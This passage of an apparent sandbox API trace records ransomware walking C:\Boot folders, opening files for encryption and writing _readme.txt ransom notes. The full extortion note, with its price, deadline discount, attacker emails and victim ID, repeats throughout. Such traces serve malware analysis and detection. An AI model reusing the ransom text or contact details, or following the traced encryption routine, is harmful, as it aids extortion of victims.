photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.866] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.866] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.866] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0228.866] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.866] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0228.866] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.867] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0228.867] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.867] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0228.867] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.867] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0228.867] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.867] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.868] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.868] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.868] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0228.868] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.868] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.868] PathFindFileNameW (pszPath="") returned="" [0228.868] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.868] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.868] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.868] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.868] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0228.868] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0228.869] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.869] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.869] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.869] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.869] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0228.869] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.869] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.869] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.869] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.869] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0228.869] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.869] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.869] PathFindFileNameW (pszPath="") returned="" [0228.870] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.870] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.870] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.870] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.870] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0228.870] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0228.870] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.870] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.870] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.871] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.871] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0228.871] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.872] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.872] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.872] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.872] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0228.872] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.872] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.872] PathFindFileNameW (pszPath="") returned="" [0228.872] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.872] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.872] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.873] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.873] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0228.873] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0228.873] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.873] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.873] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.873] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, 